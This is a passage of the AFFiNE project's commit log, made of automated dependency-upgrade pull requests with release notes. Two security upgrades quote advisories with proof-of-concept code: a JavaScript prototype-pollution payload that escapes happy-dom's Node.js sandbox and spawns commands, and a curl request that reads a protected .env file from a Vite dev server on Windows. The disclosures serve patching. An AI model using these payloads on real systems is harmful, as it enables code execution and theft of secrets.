the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/toeverything/AFFiNE/network/alerts).

</details>

---------

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
Co-authored-by: DarkSky <darksky2048@gmail.com>
2025-10-21 17:47:26 +00:00
renovate[bot] c18840038f chore: bump up @sentry/electron version to v7 (#13652)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
|
[@sentry/electron](https://redirect.github.com/getsentry/sentry-electron)
| [`^6.1.0` ->
`^7.0.0`](https://renovatebot.com/diffs/npm/@sentry%2felectron/6.6.0/7.2.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@sentry%2felectron/7.2.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@sentry%2felectron/6.6.0/7.2.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

---

### Release Notes

<details>
<summary>getsentry/sentry-electron (@&#8203;sentry/electron)</summary>

###
[`v7.2.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#720)

[Compare
Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.1...7.2.0)

- feat: Update JavaScript SDKs from
[v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0)
to
[v10.17.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.17.0)
- feat: Log os and device attributes
([#&#8203;1246](https://redirect.github.com/getsentry/sentry-electron/issues/1246))

###
[`v7.1.1`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#711)

[Compare
Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.0...7.1.1)

- fix: Preload injection path
([#&#8203;1243](https://redirect.github.com/getsentry/sentry-electron/issues/1243))
- fix: Preload `contextIsolation` issues
([#&#8203;1244](https://redirect.github.com/getsentry/sentry-electron/issues/1244))
- fix: Include `sentry.origin` with auto-generated logs
([#&#8203;1241](https://redirect.github.com/getsentry/sentry-electron/issues/1241))

###
[`v7.1.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#710)

[Compare
Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.0.0...7.1.0)

- feat: Update JavaScript SDKs from
[v10.7.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.7.0)
to
[v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0)
([#&#8203;1236](https://redirect.github.com/getsentry/sentry-electron/issues/1236))
- feat: Optional Namespaced IPC
([#&#8203;1234](https://redirect.github.com/getsentry/sentry-electron/issues/1234))
- fix: Export `ErrorEvent` type
([#&#8203;1229](https://redirect.github.com/getsentry/sentry-electron/issues/1229))
- fix: Only capture logs if `enableLogs` is true
([#&#8203;1235](https://redirect.github.com/getsentry/sentry-electron/issues/1235))

###
[`v7.0.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#700)

[Compare
Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.11.0...7.0.0)

This release updates the underlying Sentry JavaScript SDKs to v10 which
includes
some breaking changes. Check out the the [migration
guide](./MIGRATION.md) for
more details.

- feat: Update JavaScript SDKs to v10.8.0
([#&#8203;1205](https://redirect.github.com/getsentry/sentry-electron/issues/1205))

###
[`v6.11.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6110)

[Compare
Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.10.0...6.11.0)

- feat: Update JavaScript SDKs from
[v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0)
to
[v9.46.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.46.0)
- fix: Ensure native directory ends up in package
([#&#8203;1216](https://redirect.github.com/getsentry/sentry-electron/issues/1216))

###
[`v6.10.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6100)

[Compare
Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.9.0...6.10.0)

- feat: Update JavaScript SDKs from
[v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0)
to
[v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0)
- fix: Don't use `deepmerge` to merge events to remove circular ref.
issues
([#&#8203;1210](https://redirect.github.com/getsentry/sentry-electron/issues/1210))
- fix: Support `node16` for TypeScript `moduleResolution`
([#&#8203;1203](https://redirect.github.com/getsentry/sentry-electron/issues/1203))

###
[`v6.9.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#690)

[Compare
Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.8.0...6.9.0)

- feat: Update JavaScript SDKs from

[v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0)
  to

[v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0)
- feat: Add `eventLoopBlockIntegration`
([#&#8203;1188](https://redirect.github.com/getsentry/sentry-electron/issues/1188))
- feat: Move renderer event loop block detection to an integration
([#&#8203;1196](https://redirect.github.com/getsentry/sentry-electron/issues/1196))

###
[`v6.8.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#680)

[Compare
Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.7.0...6.8.0)

- feat: Update JavaScript SDKs from
[v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0)
to
[v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0)
- fix: Don't capture stack traces from destroyed renderers
([#&#8203;1165](https://redirect.github.com/getsentry/sentry-electron/issues/1165))

###
[`v6.7.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#670)

[Compare
Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.6.0...6.7.0)

- feat: Update JavaScript SDKs from
[v9.18.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.18.0)
to
[v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0)
- feat: Add structured logging support
([#&#8203;1159](https://redirect.github.com/getsentry/sentry-electron/issues/1159))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzAuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2025-10-21 17:31:20 +00:00
renovate[bot] a47042cbd5 chore: bump up happy-dom version to v20.0.2 [SECURITY] (#13765)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [happy-dom](https://redirect.github.com/capricorn86/happy-dom) |
[`20.0.0` ->
`20.0.2`](https://renovatebot.com/diffs/npm/happy-dom/20.0.0/20.0.2) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/happy-dom/20.0.2?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/happy-dom/20.0.0/20.0.2?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2025-62410](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5)

### Summary
The mitigation proposed in GHSA-37j7-fg3j-429f for disabling
eval/Function when executing untrusted code in happy-dom does not
suffice, since it still allows prototype pollution payloads.

### Details
The untrusted script and the rest of the application still run in the
same Isolate/process, so attackers can deploy prototype pollution
payloads to hijack important references like "process" in the example
below, or to hijack control flow via flipping checks of undefined
property. There might be other payloads that allow the manipulation of
require, e.g., via (univeral) gadgets
(https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).

### PoC
Attackers can pollute builtins like Object.prototype.hasOwnProperty() to
obtain important references at runtime, e.g., "process". In this way,
attackers might be able to execute arbitrary commands like in the
example below via spawn().

```js
import { Browser } from "happy-dom";

const browser = new Browser({settings: {enableJavaScriptEvaluation: true}});
const page = browser.newPage({console: true});

page.url = 'https://example.com';
let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};'
page.content = `<html>
<script>
    function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";} 
    this.constructor.constructor.__proto__.__proto__.toString = f;
    this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;
    // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf
    
</script>
<body>Hello world!</body></html>`;

await browser.close();
console.log(`The process object is ${process}`);
console.log(process.hasOwnProperty('spawn'));
```

### Impact
Arbitrary code execution via breaking out of the Node.js' vm isolation.

### Recommended Immediate Actions
Users can freeze the builtins in the global scope to defend against
attacks similar to the PoC above. However, the untrusted code might
still be able to retrieve all kind of information available in the
global scope and exfiltrate them via fetch(), even without prototype
pollution capabilities. Not to mention side channels caused by the
shared process/isolate. Migration to
[isolated-vm](https://redirect.github.com/laverdet/isolated-vm) is
suggested instead.

Cris from the Endor Labs Security Research Team, who has worked
extensively on JavaScript sandboxing in the past, submitted this
advisory.

---

### Release Notes

<details>
<summary>capricorn86/happy-dom (happy-dom)</summary>

###
[`v20.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.2)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.1...v20.0.2)

##### :construction\_worker\_man: Patch fixes

- Adds frozen intrinsics flag to workers in `@happy-dom/server-renderer`
- By **[@&#8203;capricorn86](https://redirect.github.com/capricorn86)**
in task
[#&#8203;1934](https://redirect.github.com/capricorn86/happy-dom/issues/1934)

###
[`v20.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.1)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.0...v20.0.1)

##### :construction\_worker\_man: Patch fixes

- Adds warning for environment with unfrozen intrinsics (builtins) when
JavaScript evaluation is enabled- By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1932](https://redirect.github.com/capricorn86/happy-dom/issues/1932)
- A security advisory has been reported showing that the recommended
preventive measure of running Node.js with
`--disallow-code-generation-from-strings` wasn't enough to protect
against attackers escaping the VM context and accessing process-level
functions. Big thanks to
[@&#8203;cristianstaicu](https://redirect.github.com/cristianstaicu) for
reporting this!
- The documentation for how to run Happy DOM with JavaScript evaluation
enabled in a safer way has been updated. Read more about it in the
[Wiki](https://redirect.github.com/capricorn86/happy-dom/wiki/JavaScript-Evaluation-Warning)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE1Ni4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2025-10-21 16:13:36 +00:00
renovate[bot] 2c44d3abc6 chore: bump up vite version to v7 [SECURITY] (#13786)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [vite](https://vite.dev)
([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite))
| [`^6.1.0` ->
`^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/vite/7.1.11?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/vite/6.3.6/7.1.11?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [vite](https://vite.dev)
([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite))
| [`^6.0.3` ->
`^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/vite/7.1.11?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/vite/6.3.6/7.1.11?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2025-62522](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7)

### Summary
Files denied by
[`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny)
were sent if the URL ended with `\` when the dev server is running on
Windows.

### Impact
Only apps that match the following conditions are affected:

- explicitly exposes the Vite dev server to the network (using --host or
[`server.host` config
option](https://vitejs.dev/config/server-options.html#server-host))
- running the dev server on Windows

### Details
`server.fs.deny` can contain patterns matching against files (by default
it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These
patterns were able to bypass by using a back slash(`\`). The root cause
is that `fs.readFile('/foo.png/')` loads `/foo.png`.

### PoC
```shell
npm create vite@latest
cd vite-project/
cat "secret" > .env
npm install
npm run dev
curl --request-target /.env\ http://localhost:5173
```
<img width="1593" height="616" alt="image"
src="https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175"
/>

---

### Release Notes

<details>
<summary>vitejs/vite (vite)</summary>

###
[`v7.1.11`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-7111-2025-10-20-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.1.10...v7.1.11)

##### Bug Fixes

- **dev:** trim trailing slash before `server.fs.deny` check
([#&#8203;20968](https://redirect.github.com/vitejs/vite/issues/20968))
([f479cc5](https://redirect.github.com/vitejs/vite/commit/f479cc57c425ed41ceb434fecebd63931b1ed4ed))

##### Miscellaneous Chores

- **deps:** update all non-major dependencies
([#&#8203;20966](https://redirect.github.com/vitejs/vite/issues/20966))
([6fb41a2](https://redirect.github.com/vitejs/vite/commit/6fb41a260bda443685e719ea4765d3faca3db944))

##### Code Refactoring

- use subpath imports for types module reference
([#&#8203;20921](https://redirect.github.com/vitejs/vite/issues/20921))
([d0094af](https://redirect.github.com/vitejs/vite/commit/d0094af639d9ebbb51d4e00910b74f23eb8fe131))

##### Build System

- remove cjs reference in files field
([#&#8203;20945](https://redirect.github.com/vitejs/vite/issues/20945))
([ef411ce](https://redirect.github.com/vitejs/vite/commit/ef411cee2696af3ba791879fdae9aad165f178b2))
- remove hash from built filenames
([#&#8203;20946](https://redirect.github.com/vitejs/vite/issues/20946))
([a817307](https://redirect.github.com/vitejs/vite/commit/a81730754d655d1371ce0f4354af1c84e12f9f2d))

###
[`v7.1.10`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-7110-2025-10-14-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.1.9...v7.1.10)

##### Bug Fixes

- **css:** avoid duplicate style for server rendered stylesheet link and
client inline style during dev
([#&#8203;20767](https://redirect.github.com/vitejs/vite/issues/20767))
([3a92bc7](https://redirect.github.com/vitejs/vite/commit/3a92bc79b306a01b8aaf37f80b2239eaf6e488e7))
- **css:** respect emitAssets when cssCodeSplit=false
([#&#8203;20883](https://redirect.github.com/vitejs/vite/issues/20883))
([d3e7eee](https://redirect.github.com/vitejs/vite/commit/d3e7eeefa91e1992f47694d16fe4dbe708c4d80e))
- **deps:** update all non-major dependencies
([879de86](https://redirect.github.com/vitejs/vite/commit/879de86935a31b4e47ab907ddd859366518ce268))
- **deps:** update all non-major dependencies
([#&#8203;20894](https://redirect.github.com/vitejs/vite/issues/20894))
([3213f90](https://redirect.github.com/vitejs/vite/commit/3213f90ff0d8f274bcec65f40aac6dfcff1ac244))
- **dev:** allow aliases starting with `//`
([#&#8203;20760](https://redirect.github.com/vitejs/vite/issues/20760))
([b95fa2a](https://redirect.github.com/vitejs/vite/commit/b95fa2aa7564eda4c9f05ee7616a2dbada35e463))
- **dev:** remove timestamp query consistently
([#&#8203;20887](https://redirect.github.com/vitejs/vite/issues/20887))
([6537d15](https://redirect.github.com/vitejs/vite/commit/6537d15591619d7e1cfc1e50599bec16cd88340f))
- **esbuild:** inject esbuild helpers correctly for esbuild 0.25.9+
([#&#8203;20906](https://redirect.github.com/vitejs/vite/issues/20906))
([446eb38](https://redirect.github.com/vitejs/vite/commit/446eb386329ef682d614c77958a542f2dc222880))
- normalize path before calling `fileToBuiltUrl`
([#&#8203;20898](https://redirect.github.com/vitejs/vite/issues/20898))
([73b6d24](https://redirect.github.com/vitejs/vite/commit/73b6d243e0398ee5d8d44c7d24162f4a0f4b1cf1))
- preserve original sourcemap file field when combining sourcemaps
([#&#8203;20926](https://redirect.github.com/vitejs/vite/issues/20926))
([c714776](https://redirect.github.com/vitejs/vite/commit/c714776aa1dcc24299a81c1495cbcbb1b1ef1dd3))

##### Documentation

- correct `WebSocket` spelling
([#&#8203;20890](https://redirect.github.com/vitejs/vite/issues/20890))
([29e98dc](https://redirect.github.com/vitejs/vite/commit/29e98dc3efe35efbd978523367c05db7d2e7a278))

##### Miscellaneous Chores

- **deps:** update rolldown-related dependencies
([#&#8203;20923](https://redirect.github.com/vitejs/vite/issues/20923))
([a5e3b06](https://redirect.github.com/vitejs/vite/commit/a5e3b064fa7ca981cb6f15f8e88806b36a99b8bf))

###
[`v7.1.9`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-719-2025-10-03-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.1.8...v7.1.9)

##### Reverts

- **server:** drain stdin when not interactive
([#&#8203;20885](https://redirect.github.com/vitejs/vite/issues/20885))
([12d72b0](https://redirect.github.com/vitejs/vite/commit/12d72b0538ef1540bfb0f1dd8a44b75deaa3464e))

###
[`v7.1.8`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-718-2025-10-02-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.1.7...v7.1.8)

##### Bug Fixes

- **css:** improve url escape characters handling
([#&#8203;20847](https://redirect.github.com/vitejs/vite/issues/20847))
([24a61a3](https://redirect.github.com/vitejs/vite/commit/24a61a3f5404279e91f7ceebf7449a5e874f9d56))
- **deps:** update all non-major dependencies
([#&#8203;20855](https://redirect.github.com/vitejs/vite/issues/20855))
([788a183](https://redirect.github.com/vitejs/vite/commit/788a183afce57de13f5656f0cf42cdf6fdc3ebaa))
- **deps:** update artichokie to 0.4.2
([#&#8203;20864](https://redirect.github.com/vitejs/vite/issues/20864))
([e670799](https://redirect.github.com/vitejs/vite/commit/e670799e123dca78e1a63aeb06dbadade3d5ab51))
- **dev:** skip JS responses for document requests
([#&#8203;20866](https://redirect.github.com/vitejs/vite/issues/20866))
([6bc6c4d](https://redirect.github.com/vitejs/vite/commit/6bc6c4dbc23501577d3919dc841454eb2eb14a54))
- **glob:** fix HMR for array patterns with exclusions
([#&#8203;20872](https://redirect.github.com/vitejs/vite/issues/20872))
([63e040f](https://redirect.github.com/vitejs/vite/commit/63e040f1ca6b635a007eb40aa7c8b891e8cc5799))
- keep ids for virtual modules as-is
([#&#8203;20808](https://redirect.github.com/vitejs/vite/issues/20808))
([d4eca98](https://redirect.github.com/vitejs/vite/commit/d4eca986d679c77bd449db20fd99d8255985b550))
- **server:** drain stdin when not interactive
([#&#8203;20837](https://redirect.github.com/vitejs/vite/issues/20837))
([bb950e9](https://redirect.github.com/vitejs/vite/commit/bb950e92b372f9a52245e9542cf9d9700d23ef8c))
- **server:** improve malformed URL handling in middlewares
([#&#8203;20830](https://redirect.github.com/vitejs/vite/issues/20830))
([d65a983](https://redirect.github.com/vitejs/vite/commit/d65a9831c984e562c5bf2b5f427de16f6e1bd931))

##### Documentation

- **create-vite:** provide deno example
([#&#8203;20747](https://redirect.github.com/vitejs/vite/issues/20747))
([fdb758a](https://redirect.github.com/vitejs/vite/commit/fdb758a51796b1ab605437b2eee778a84e87e169))

##### Miscellaneous Chores

- **deps:** update rolldown-related dependencies
([#&#8203;20810](https://redirect.github.com/vitejs/vite/issues/20810))
([ea68a88](https://redirect.github.com/vitejs/vite/commit/ea68a8868c7ee249213057f8a81c3f92a9839dde))
- **deps:** update rolldown-related dependencies
([#&#8203;20854](https://redirect.github.com/vitejs/vite/issues/20854))
([4dd06fd](https://redirect.github.com/vitejs/vite/commit/4dd06fdc8d643059c2abf88188eae7c4877aab6e))
- update url of `create-react-app` license
([#&#8203;20865](https://redirect.github.com/vitejs/vite/issues/20865))
([166a178](https://redirect.github.com/vitejs/vite/commit/166a178f45b6e48db27b5626559f5ec3358c2fb4))

###
[`v7.1.7`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-717-2025-09-22-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.1.6...v7.1.7)

##### Bug Fixes

- **build:** fix ssr environment `emitAssets: true` when
`sharedConfigBuild: true`
([#&#8203;20787](https://redirect.github.com/vitejs/vite/issues/20787))
([4c4583c](https://redirect.github.com/vitejs/vite/commit/4c4583ce7a13306e0853901570c5d95517fe81da))
- **client:** use CSP nonce when rendering error overlay
([#&#8203;20791](https://redirect.github.com/vitejs/vite/issues/20791))
([9bc9d12](https://redirect.github.com/vitejs/vite/commit/9bc9d1258f550e9d8f5e530cd27aecb1bee32bdb))
- **deps:** update all non-major dependencies
([#&#8203;20811](https://redirect.github.com/vitejs/vite/issues/20811))
([9f2247c](https://redirect.github.com/vitejs/vite/commit/9f2247c066cac75746356c9391845235445a154b))
- **glob:** handle glob imports from folders starting with dot
([#&#8203;20800](https://redirect.github.com/vitejs/vite/issues/20800))
([105abe8](https://redirect.github.com/vitejs/vite/commit/105abe87c412cf0f83859ba41fed869221cbb3e0))
- **hmr:** trigger prune event when import is removed from non hmr
module
([#&#8203;20768](https://redirect.github.com/vitejs/vite/issues/20768))
([9f32b1d](https://redirect.github.com/vitejs/vite/commit/9f32b1dc710991c53a9f665c8d0d6945f342bf92))
- **hmr:** wait for `import.meta.hot.prune` callbacks to complete before
running other HMRs
([#&#8203;20698](https://redirect.github.com/vitejs/vite/issues/20698))
([98a3484](https://redirect.github.com/vitejs/vite/commit/98a3484733443ee529870477a6ab6a03572e3cbc))

###
[`v7.1.6`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-716-2025-09-18-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.1.5...v7.1.6)

##### Bug Fixes

- **deps:** update all non-major dependencies
([#&#8203;20773](https://redirect.github.com/vitejs/vite/issues/20773))
([88af2ae](https://redirect.github.com/vitejs/vite/commit/88af2ae7df77160e7d11a9fa147a4967c8499f13))
- **esbuild:** inject esbuild helper functions with minified `$`
variables correctly
([#&#8203;20761](https://redirect.github.com/vitejs/vite/issues/20761))
([7e8e004](https://redirect.github.com/vitejs/vite/commit/7e8e0043d60379e11da481d9cc3c3556c9756ac0))
- fallback terser to main thread when nameCache is provided
([#&#8203;20750](https://redirect.github.com/vitejs/vite/issues/20750))
([a679a64](https://redirect.github.com/vitejs/vite/commit/a679a643404c95556dda2670643e14eca9c585bd))
- **types:** strict env typings fail when `skipLibCheck` is `false`
([#&#8203;20755](https://redirect.github.com/vitejs/vite/issues/20755))
([cc54e29](https://redirect.github.com/vitejs/vite/commit/cc54e294746d3eac868de96f85d98dd0fa0cda11))

##### Miscellaneous Chores

- **deps:** update rolldown-related dependencies
([#&#8203;20675](https://redirect.github.com/vitejs/vite/issues/20675))
([a67bb5f](https://redirect.github.com/vitejs/vite/commit/a67bb5fbec5f3e42151dc7e3166858d0d33533de))
- **deps:** update rolldown-related dependencies
([#&#8203;20772](https://redirect.github.com/vitejs/vite/issues/20772))
([d785e72](https://redirect.github.com/vitejs/vite/commit/d785e72f2ead705e8b2416c0a5097878fced3435))

###
[`v7.1.5`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-715-2025-09-08-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.1.4...v7.1.5)

##### Bug Fixes

- apply `fs.strict` check to HTML files
([#&#8203;20736](https://redirect.github.com/vitejs/vite/issues/20736))
([14015d7](https://redirect.github.com/vitejs/vite/commit/14015d794f69accba68798bd0e15135bc51c9c1e))
- **deps:** update all non-major dependencies
([#&#8203;20732](https://redirect.github.com/vitejs/vite/issues/20732))
([122bfba](https://redirect.github.com/vitejs/vite/commit/122bfbabeb1f095ce7cabd30893e5531e9a007c4))
- upgrade sirv to 3.0.2
([#&#8203;20735](https://redirect.github.com/vitejs/vite/issues/20735))
([09f2b52](https://redirect.github.com/vitejs/vite/commit/09f2b52e8d5907f26602653caf41b3a56692600d))

###
[`v7.1.4`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-714-2025-09-01-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.1.3...v7.1.4)

##### Bug Fixes

- add missing awaits
([#&#8203;20697](https://redirect.github.com/vitejs/vite/issues/20697))
([79d10ed](https://redirect.github.com/vitejs/vite/commit/79d10ed6341ba7a751d007b7ad113a9b8be9c853))
- **deps:** update all non-major dependencies
([#&#8203;20676](https://redirect.github.com/vitejs/vite/issues/20676))
([5a274b2](https://redirect.github.com/vitejs/vite/commit/5a274b29df83744cf0ce4dafd94029d2a9e01135))
- **deps:** update all non-major dependencies
([#&#8203;20709](https://redirect.github.com/vitejs/vite/issues/20709))
([0401feb](https://redirect.github.com/vitejs/vite/commit/0401feba17e60bd7e976c5643128a0da49670a83))
- pass rollup watch options when building in watch mode
([#&#8203;20674](https://redirect.github.com/vitejs/vite/issues/20674))
([f367453](https://redirect.github.com/vitejs/vite/commit/f367453ca2825bc8a390d41c5d13b161756f2b41))

##### Miscellaneous Chores

- remove unused constants entry from rolldown.config.ts
([#&#8203;20710](https://redirect.github.com/vitejs/vite/issues/20710))
([537fcf9](https://redirect.github.com/vitejs/vite/commit/537fcf91862a1bf51e70ce6fe9b414319dd3a675))

##### Code Refactoring

- remove unnecessary `minify` parameter from `finalizeCss`
([#&#8203;20701](https://redirect.github.com/vitejs/vite/issues/20701))
([8099582](https://redirect.github.com/vitejs/vite/commit/8099582e5364f907f2bc6cb8e2d52ae0c4d937e4))

###
[`v7.1.3`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-713-2025-08-19-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v7.1.2...v7.1.3)

##### Features

- **cli:** add Node.js version warning for unsupported versions
([#&#8203;20638](https://redirect.github.com/vitejs/vite/issues/20638))
([a1be1bf](https://redirect.github.com/vitejs/vite/commit/a1be1bf0905b9086e5f1370c63d76a7fa4a195ec))
- generate code frame for parse errors thrown by terser
([#&#8203;20642](https://redirect.github.com/vitejs/vite/issues/20642))
([a9ba017](https://redirect.github.com/vitejs/vite/commit/a9ba0174a58b949373d6b4240bc69180dff0b780))
- support long lines in `generateCodeFrame`
